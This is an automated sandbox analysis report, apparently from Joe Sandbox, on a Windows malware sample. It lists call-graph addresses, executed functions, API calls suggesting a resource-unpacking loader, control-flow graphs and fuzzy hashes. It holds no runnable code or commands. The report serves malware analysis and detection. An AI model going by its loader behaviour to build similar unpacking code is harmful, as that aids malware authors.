41d65630 WaitMessage 59870->59872 59873 41d6521a 59870->59873 59871->59870 59872->59870 59873->59860 59877 41d651cd 59874->59877 59875 41d64250 PeekMessageW 59875->59877 59876 41d65630 WaitMessage 59876->59877 59877->59875 59877->59876 59878 41d6521a 59877->59878 59878->59860 59880 41a3c305 59879->59880 59881 41a3c33e 59880->59881 59887 41a3aadc 59880->59887 59881->59866 59884 41a3c305 59883->59884 59885 41a3c33e 59884->59885 59886 41a3aadc 3 API calls 59884->59886 59885->59866 59886->59885 59888 41a3aae7 59887->59888 59889 41a3c3b0 59888->59889 59891 41a3b4cc 59888->59891 59892 41a3b4d7 59891->59892 59898 41a3b4dc 59892->59898 59894 41a3c41f 59902 41d60e78 59894->59902 59911 41d60e6f 59894->59911 59895 41a3c459 59895->59889 59901 41a3b4e7 59898->59901 59899 41a3d1f8 59899->59894 59900 41a3c148 3 API calls 59900->59899 59901->59899 59901->59900 59904 41d60ea9 59902->59904 59906 41d60fa9 59902->59906 59903 41d60eb5 59903->59895 59904->59903 59919 41d610e3 59904->59919 59931 41d610f0 59904->59931 59905 41d60ef5 59907 41a31ab8 GetModuleHandleW 59905->59907 59908 41a31aaf GetModuleHandleW 59905->59908 59906->59895 59907->59906 59908->59906 59912 41d60e78 59911->59912 59914 41d60eb5 59912->59914 59915 41d610e3 3 API calls 59912->59915 59916 41d610f0 3 API calls 59912->59916 59913 41d60ef5 59917 41a31ab8 GetModuleHandleW 59913->59917 59918 41a31aaf GetModuleHandleW 59913->59918 59914->59895 59915->59913 59916->59913 59917->59914 59918->59914 59920 41d6113e 59919->59920 59921 41d610ee 59919->59921 59922 41d6114c 59920->59922 59929 41a314a0 GetModuleHandleW 59920->59929 59943 41a324bb 59920->59943 59923 41d610fa 59921->59923 59927 41d610e3 3 API calls 59921->59927 59935 41d61120 59921->59935 59924 41d6115c 59922->59924 59947 41d6131e 59922->59947 59951 41d61320 59922->59951 59923->59905 59924->59905 59927->59923 59929->59922 59933 41d610e3 3 API calls 59931->59933 59934 41d61120 3 API calls 59931->59934 59932 41d610fa 59932->59905 59933->59932 59934->59932 59936 41d61141 59935->59936 59938 41d6115c 59935->59938 59939 41a314a0 GetModuleHandleW 59936->59939 59940 41a324bb GetModuleHandleW 59936->59940 59937 41d6114c 59937->59938 59941 41d61320 LoadLibraryExW 59937->59941 59942 41d6131e LoadLibraryExW 59937->59942 59938->59923 59939->59937 59940->59937 59941->59938 59942->59938 59944 41a324c0 GetModuleHandleW 59943->59944 59946 41a32535 59944->59946 59946->59922 59948 41d61320 59947->59948 59949 41d61359 59948->59949 59950 41d60618 LoadLibraryExW 59948->59950 59949->59924 59950->59949 59952 41d61334 59951->59952 59953 41d60618 LoadLibraryExW 59952->59953 59954 41d61359 59952->59954 59953->59954 59954->59924 59955 3d9492e8 59956 3d949328 FindCloseChangeNotification 59955->59956 59958 3d949359 59956->59958 59430 40cbdd 59431 40cbe9 __alloc_osfhnd 59430->59431 59474 40d534 HeapCreate 59431->59474 59434 40cc46 59535 41087e 71 API calls 8 library calls 59434->59535 59437 40cc4c 59438 40cc50 59437->59438 59439 40cc58 __RTC_Initialize 59437->59439 59536 40cbb4 62 API calls 3 library calls 59438->59536 59476 411a15 67 API calls 2 library calls 59439->59476 59441 40cc57 59441->59439 59443 40cc66 59444 40cc72 GetCommandLineA 59443->59444 59445 40cc6a 59443->59445 59477 412892 71 API calls 3 library calls 59444->59477 59537 40e79a 62 API calls 3 library calls 59445->59537 59448 40cc71 59448->59444 59449 40cc82 59538 4127d7 107 API calls 3 library calls 59449->59538 59451 40cc8c 59452 40cc90 59451->59452 59453 40cc98 59451->59453 59539 40e79a 62 API calls 3 library calls 59452->59539 59478 41255f 106 API calls 6 library calls 59453->59478 59456 40cc97 59456->59453 59457 40cc9d 59458 40cca1 59457->59458 59459 40cca9 59457->59459 59540 40e79a 62 API calls 3 library calls 59458->59540 59479 40e859 73 API calls 5 library calls 59459->59479 59462 40cca8 59462->59459 59463 40ccb0 59464 40ccb5 59463->59464 59465 40ccbc 59463->59465 59541 40e79a 62 API calls 3 library calls 59464->59541 59480 4019f0 OleInitialize 59465->59480 59468 40ccd8 59470 40ccea 59468->59470 59542 40ea0a 62 API calls _doexit 59468->59542 59469 40ccbb 59469->59465 59543 40ea36 62 API calls _doexit 59470->59543 59473 40ccef __alloc_osfhnd 59475 40cc3a 59474->59475 59475->59434 59534 40cbb4 62 API calls 3 library calls 59475->59534 59476->59443 59477->59449 59478->59457 59479->59463 59481 401ab9 59480->59481 59544 40b99e 59481->59544 59483 401abf 59484 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 59483->59484 59514 402467 59483->59514 59485 401dc3 FindCloseChangeNotification GetModuleHandleA 59484->59485 59493 401c55 59484->59493 59557 401650 59485->59557 59487 401e8b FindResourceA LoadResource LockResource SizeofResource 59559 40b84d 59487->59559 59491 401c9c CloseHandle 59491->59468 59492 401ecb _memset 59494 401efc SizeofResource 59492->59494 59493->59491 59497 401cf9 Module32Next 59493->59497 59495 401f1c 59494->59495 59496 401f5f 59494->59496 59495->59496 59615 401560 __VEC_memcpy __cftoe2_l 59495->59615 59499 401f92 _memset 59496->59499 59616 401560 __VEC_memcpy __cftoe2_l 59496->59616 59497->59485 59506 401d0f 59497->59506 59501 401fa2 FreeResource 59499->59501 59502 40b84d _malloc 62 API calls 59501->59502 59503 401fbb SizeofResource 59502->59503 59504 401fe5 _memset 59503->59504 59505 4020aa LoadLibraryA 59504->59505 59507 401650 59505->59507 59506->59491 59509 401dad Module32Next 59506->59509 59508 40216c GetProcAddress 59507->59508 59510 4021aa 59508->59510 59508->59514 59509->59485 59509->59506 59510->59514 59589 4018f0 59510->59589 59512 40243f 59512->59514 59617 40b6b5 62 API calls 2 library calls 59512->59617 59514->59468 59515 4021f1 59515->59512 59601 401870 59515->59601 59517 402269 VariantInit 59518 401870 75 API calls 59517->59518 59519 40228b VariantInit 59518->59519 59520 4022a7 59519->59520 59521 4022d9 SafeArrayCreate SafeArrayAccessData 59520->59521 59606 40b350 59521->59606 59524 40232c 59525 402354 SafeArrayDestroy 59524->59525 59533 40235b 59524->59533 59525->59533 59526 402392 SafeArrayCreateVector 59527 4023a4 59526->59527 59528 4023bc VariantClear VariantClear 59527->59528 59608 4019a0 59528->59608 59531 40242e 59532 4019a0 65 API calls 59531->59532 59532->59512 59533->59526 59534->59434 59535->59437 59536->59441 59537->59448 59538->59451 59539->59456 59540->59462 59541->59469 59542->59470 59543->59473 59547 40b9aa __alloc_osfhnd _strnlen 59544->59547 59545 40b9b8 59618 40bfc1 62 API calls __getptd_noexit 59545->59618 59547->59545 59550 40b9ec 59547->59550 59548 40b9bd 59619 40e744 6 API calls 2 library calls 59548->59619 59620 40d6e0 62 API calls 2 library calls 59550->59620 59552 40b9f3 59621 40b917 120 API calls 3 library calls 59552->59621 59554 40b9ff 59622 40ba18 LeaveCriticalSection _doexit 59554->59622 59555 40b9cd __alloc_osfhnd 59555->59483 59558 4017cc _memcpy_s 59557->59558 59558->59487 59560 40b900 59559->59560 59569 40b85f 59559->59569 59630 40d2e3 6 API calls __decode_pointer 59560->59630 59562 40b906 59631 40bfc1 62 API calls __getptd_noexit 59562->59631 59567 40b8bc RtlAllocateHeap 59567->59569 59569->59567 59570 40b870 59569->59570 59571 40b8ec 59569->59571 59574 40b8f1 59569->59574 59576 401ebf 59569->59576 59626 40b7fe 62 API calls 4 library calls 59569->59626 59627 40d2e3 6 API calls __decode_pointer 59569->59627 59570->59569 59623 40ec4d 62 API calls 2 library calls 59570->59623 59624 40eaa2 62 API calls 7 library calls 59570->59624 59625 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 59570->59625 59628 40bfc1 62 API calls __getptd_noexit 59571->59628 59629 40bfc1 62 API calls __getptd_noexit 59574->59629 59577 40af66 59576->59577 59579 40af70 59577->59579 59578 40b84d _malloc 62 API calls 59578->59579 59579->59578 59580 40af8a 59579->59580 59584 40af8c std::bad_alloc::bad_alloc 59579->59584 59632 40d2e3 6 API calls __decode_pointer 59579->59632 59580->59492 59582 40afb2 59634 40af49 62 API calls std::exception::exception 59582->59634 59584->59582 59633 40d2bd 73 API calls __cinit 59584->59633 59585 40afbc 59635 40cd39 RaiseException 59585->59635 59588 40afca 59590 401903 lstrlenA 59589->59590 59591 4018fc 59589->59591 59636 4017e0 59590->59636 59591->59515 59594 401940 GetLastError 59596 40194b MultiByteToWideChar 59594->59596 59597 40198d 59594->59597 59595 401996 59595->59515 59598 4017e0 77 API calls 59596->59598 59597->59595 59652 401030 GetLastError EntryPoint 59597->59652 59599 401970 MultiByteToWideChar 59598->59599 59599->59597 59602 40af66 74 API calls 59601->59602 59603 40187c 59602->59603 59604 401885 SysAllocString 59603->59604 59605 4018a4 59603->59605 59604->59605 59605->59517 59607 40231a SafeArrayUnaccessData 59606->59607 59607->59524 59609 4019aa InterlockedDecrement 59608->59609 59610 4019df VariantClear 59608->59610 59609->59610 59611 4019b8 59609->59611 59610->59531 59611->59610 59612 4019c2 SysFreeString 59611->59612 59613 4019c9 59611->59613 59612->59613 59656 40aec0 63 API calls 2 library calls 59613->59656 59615->59495 59616->59499 59617->59514 59618->59548 59620->59552 59621->59554 59622->59555 59623->59570 59624->59570 59626->59569 59627->59569 59628->59574 59629->59576 59630->59562 59631->59576 59632->59579 59633->59582 59634->59585 59635->59588 59637 4017f3 59636->59637 59638 4017e9 EntryPoint 59636->59638 59639 401805 59637->59639 59640 4017fb EntryPoint 59637->59640 59638->59637 59641 401818 59639->59641 59642 40180e EntryPoint 59639->59642 59640->59639 59643 401844 59641->59643 59644 40183e 59641->59644 59653 40b783 72 API calls 4 library calls 59641->59653 59642->59641 59648 40186d MultiByteToWideChar 59643->59648 59649 40184e EntryPoint 59643->59649 59655 40b743 62 API calls 2 library calls 59643->59655 59654 40b6b5 62 API calls 2 library calls 59644->59654 59648->59594 59648->59595 59649->59643 59650 40182d 59650->59643 59651 401834 EntryPoint 59650->59651 59651->59644 59653->59650 59654->59643 59655->59643 59656->59610

                                                                                                                            Executed Functions

                                                                                                                            Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 23 401cb0-401cce call 401650 18->23 24 401c9c-401caf CloseHandle 18->24 20->16 22 401c85-401c8d 20->22 21->18 22->14 22->21 33 401cd0-401cd4 23->33 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->24 47 401cf9-401d09 Module32Next 42->47 43->39 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->50 51 401f77-401f8d call 401560 44->51 45->44 46->33 46->41 47->7 48 401d0f 47->48 52 401d10-401d2e call 401650 48->52 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 83 401da5-401da7 79->83 81 401d8a-401d90 80->81 82 401d9c-401d9e 80->82 81->79 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->77 85->82 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 3becd01d 122->154 155 40234e call 3becd005 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 3becd01d 135->152 153 402390 call 3becd005 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 141 4023b6-4023b8 140->141 142 4023ba 140->142 144 4023bc-402417 VariantClear * 2 call 4019a0 141->144 142->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                            • _getenv.LIBCMT ref: 00401ABA
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                            • Module32First.KERNEL32 ref: 00401C48
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                            • _malloc.LIBCMT ref: 00401EBA
                                                                                                                            • _memset.LIBCMT ref: 00401EDD
                                                                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                            • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                            • API String ID: 2366190142-2962942730
                                                                                                                            • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                            • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                            • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                            • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411BCD30 Relevance: 3.6, Strings: 1, Instructions: 2322COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: A
                                                                                                                            • API String ID: 0-3554254475
                                                                                                                            • Opcode ID: 0a99d7c2fd5e19dac75db49607163f83bfc8980338800e65d7a2e72f872b52c5
                                                                                                                            • Instruction ID: b958c6b90e4f43689e826c8ac7feb75c6363f974c11b2ae3078297b823ff272b
                                                                                                                            • Opcode Fuzzy Hash: 0a99d7c2fd5e19dac75db49607163f83bfc8980338800e65d7a2e72f872b52c5
                                                                                                                            • Instruction Fuzzy Hash: 76332D31D10B198EDB15EF68C89069DF7B1FF89300F15C79AE459AB211EB70AAC5CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B99A0 Relevance: 2.9, Instructions: 2853COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d3523815acbdc18558b09d840270fc603cc882942d4d714519af67fb397e6fd2
                                                                                                                            • Instruction ID: 98c9d8564855015693720b32815486302dbcbedfc361f7f52fd82baee073a677
                                                                                                                            • Opcode Fuzzy Hash: d3523815acbdc18558b09d840270fc603cc882942d4d714519af67fb397e6fd2
                                                                                                                            • Instruction Fuzzy Hash: 4263D431D10B5A8ADB11EF68C884699F7B1FF99300F55C79AE458B7121EB70AAC4CF81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41D65168 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9d2342d02364e1717b86797c04fb58ec55100870af96599c62ea35775fe46df6
                                                                                                                            • Instruction ID: 880f91e05ac8e94cf759b13c7d1b1c61044b7ed4ad7377a6f0a8c2b55feb9135
                                                                                                                            • Opcode Fuzzy Hash: 9d2342d02364e1717b86797c04fb58ec55100870af96599c62ea35775fe46df6
                                                                                                                            • Instruction Fuzzy Hash: 1AF14D70A0020ACFEB04CFA9C984B9DBBF5BF98354F158159E405AF2A5DB70ED85CB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B1220 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \V^m
                                                                                                                            • API String ID: 0-3751104571
                                                                                                                            • Opcode ID: 52563a366438cb8f597d3d0cc0ea47693a4969b65b97ea50e72adc03baa82b8f
                                                                                                                            • Instruction ID: 5fb889c0e0a2afadc155da3a0f46221c40bafd445e8e4cdb8bb96ed0fc8bc50f
                                                                                                                            • Opcode Fuzzy Hash: 52563a366438cb8f597d3d0cc0ea47693a4969b65b97ea50e72adc03baa82b8f
                                                                                                                            • Instruction Fuzzy Hash: 4EB16D70E04209CFDB14CFA9E8817DEBBF2AF89354F168129D815E7298EB749841CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B0ED8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \V^m
                                                                                                                            • API String ID: 0-3751104571
                                                                                                                            • Opcode ID: a0451eab4e7a7f1c5f37b601b51b8860fe452f460cd00a2058da79860850fac7
                                                                                                                            • Instruction ID: 9e253630c5a38b3ffe92f57410f4141aa0fd8b0d751f641434aade4d7d33d487
                                                                                                                            • Opcode Fuzzy Hash: a0451eab4e7a7f1c5f37b601b51b8860fe452f460cd00a2058da79860850fac7
                                                                                                                            • Instruction Fuzzy Hash: E4919E70E00349DFDF14CFA9D8807DEBBF2AF88354F118129E814AB298DB749946CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B1AF0 Relevance: .3, Instructions: 266COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e678203c130f30d244eea772716aa5a39356fdc2cd9b384e21fcd4dda72b92bd
                                                                                                                            • Instruction ID: d5d116afe20448af681d7857fd25d00bc4a4ecb7bdaacc0db09274b4845d5c91
                                                                                                                            • Opcode Fuzzy Hash: e678203c130f30d244eea772716aa5a39356fdc2cd9b384e21fcd4dda72b92bd
                                                                                                                            • Instruction Fuzzy Hash: 1EB1AF70E00209CFDB14CFA9E8857DEBBF2BF88354F168529D415EB298EB749841CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B5968 Relevance: 21.8, Strings: 17, Instructions: 523COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 156 411b5968-411b597f 157 411b5981-411b5984 156->157 158 411b59ab-411b59ae 157->158 159 411b5986-411b59a6 157->159 160 411b59b0-411b59d0 158->160 161 411b59d5-411b59d8 158->161 159->158 160->161 162 411b59da-411b59fa 161->162 163 411b59ff-411b5a02 161->163 162->163 165 411b5a29-411b5a2c 163->165 166 411b5a04-411b5a24 163->166 168 411b5a2e-411b5a4e 165->168 169 411b5a53-411b5a56 165->169 166->165 168->169 172 411b5a58-411b5a78 169->172 173 411b5a7d-411b5a80 169->173 172->173 176 411b5a82-411b5aa2 173->176 177 411b5aa7-411b5aaa 173->177 176->177 182 411b5aac-411b5acc 177->182 183 411b5ad1-411b5ad4 177->183 182->183 186 411b5afb-411b5afe 183->186 187 411b5ad6-411b5af6 183->187 192 411b5b00-411b5b20 186->192 193 411b5b25-411b5b28 186->193 187->186 192->193 196 411b5b2a-411b5b4a 193->196 197 411b5b4f-411b5b52 193->197 196->197 202 411b5b79-411b5b7c 197->202 203 411b5b54-411b5b74 197->203 206 411b5b7e-411b5b9e 202->206 207 411b5ba3-411b5ba6 202->207 203->202 206->207 212 411b5ba8-411b5bc8 207->212 213 411b5bcd-411b5bd0 207->213 212->213 216 411b5bd2-411b5bf2 213->216 217 411b5bf7-411b5bfa 213->217 216->217 222 411b5bfc-411b5c1c 217->222 223 411b5c21-411b5c24 217->223 222->223 226 411b5c4b-411b5c4e 223->226 227 411b5c26-411b5c46 223->227 232 411b5c50-411b5c70 226->232 233 411b5c75-411b5c78 226->233 227->226 232->233 236 411b5c7a-411b5c9a 233->236 237 411b5c9f-411b5ca2 233->237 236->237 242 411b5cc9-411b5ccc 237->242 243 411b5ca4-411b5cc4 237->243 246 411b5cce-411b5cee 242->246 247 411b5cf3-411b5cf6 242->247 243->242 246->247 252 411b5cf8-411b5d18 247->252 253 411b5d1d-411b5d20 247->253 252->253 256 411b5d22-411b5d42 253->256 257 411b5d47-411b5d4a 253->257 256->257 262 411b5d4c-411b5d6c 257->262 263 411b5d71-411b5d74 257->263 262->263 266 411b5d9b-411b5d9e 263->266 267 411b5d76-411b5d96 263->267 272 411b5da0-411b5dc0 266->272 273 411b5dc5-411b5dc8 266->273 267->266 272->273 276 411b5dca-411b5dd6 273->276 277 411b5def-411b5df2 273->277 299 411b5dde-411b5dea 276->299 282 411b5e19-411b5e1c 277->282 283 411b5df4-411b5e14 277->283 286 411b5e1e-411b5e2a 282->286 287 411b5e37-411b5e3a 282->287 283->282 307 411b5e32 286->307 292 411b5e3c-411b5e5c 287->292 293 411b5e61-411b5e64 287->293 292->293 296 411b5e8b-411b5e8e 293->296 297 411b5e66-411b5e86 293->297 302 411b5e9b-411b5e9e 296->302 303 411b5e90 296->303 297->296 299->277 309 411b5ea0-411b5ec0 302->309 310 411b5ec5-411b5ec8 302->310 314 411b5e96 303->314 307->287 309->310 312 411b5eca-411b5eea 310->312 313 411b5eef-411b5ef2 310->313 312->313 317 411b5f19-411b5f1c 313->317 318 411b5ef4-411b5f14 313->318 314->302 320 411b5f1e-411b5f3e 317->320 321 411b5f43-411b5f46 317->321 318->317 320->321 326 411b5f48-411b5f68 321->326 327 411b5f6d-411b5f70 321->327 326->327 329 411b5f72-411b5f74 327->329 330 411b5f81-411b5f84 327->330 372 411b5f76 call 411b8f1e 329->372 373 411b5f76 call 411b8e70 329->373 374 411b5f76 call 411b8e60 329->374 335 411b5fab-411b5fae 330->335 336 411b5f86-411b5fa6 330->336 338 411b5fb0-411b5fd0 335->338 339 411b5fd5-411b5fd8 335->339 336->335 338->339 345 411b5fda-411b5ffa 339->345 346 411b5fff-411b6002 339->346 340 411b5f7c 340->330 345->346 348 411b6029-411b602c 346->348 349 411b6004-411b6024 346->349 353 411b602e-411b604e 348->353 354 411b6053-411b6055 348->354 349->348 353->354 357 411b605c-411b605f 354->357 358 411b6057 354->358 357->157 361 411b6065-411b6072 357->361 358->357 372->340 373->340 374->340
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $P@A$$S@A$@d@A$HM@A$HV@A$H\@A$La@A$XR@A$`J@A$`Y@A$dO@A$dU@A$d^@A$|I@A$P@A$W@A$Z@A
                                                                                                                            • API String ID: 0-362482816
                                                                                                                            • Opcode ID: 9f9ccc973d84b76a13f17a056d2e84bf7c8bf0b409d05475a608c598511fcdee
                                                                                                                            • Instruction ID: 5ff0144db31bb40648aa81ade472b1ea4b82de937586a64cb5e1e773a1a24c5d
                                                                                                                            • Opcode Fuzzy Hash: 9f9ccc973d84b76a13f17a056d2e84bf7c8bf0b409d05475a608c598511fcdee
                                                                                                                            • Instruction Fuzzy Hash: 88027134711210ABC75A273AE1D823D3AA7FBCA755B69043ED403CB781DE76CD469B06
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A3659D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
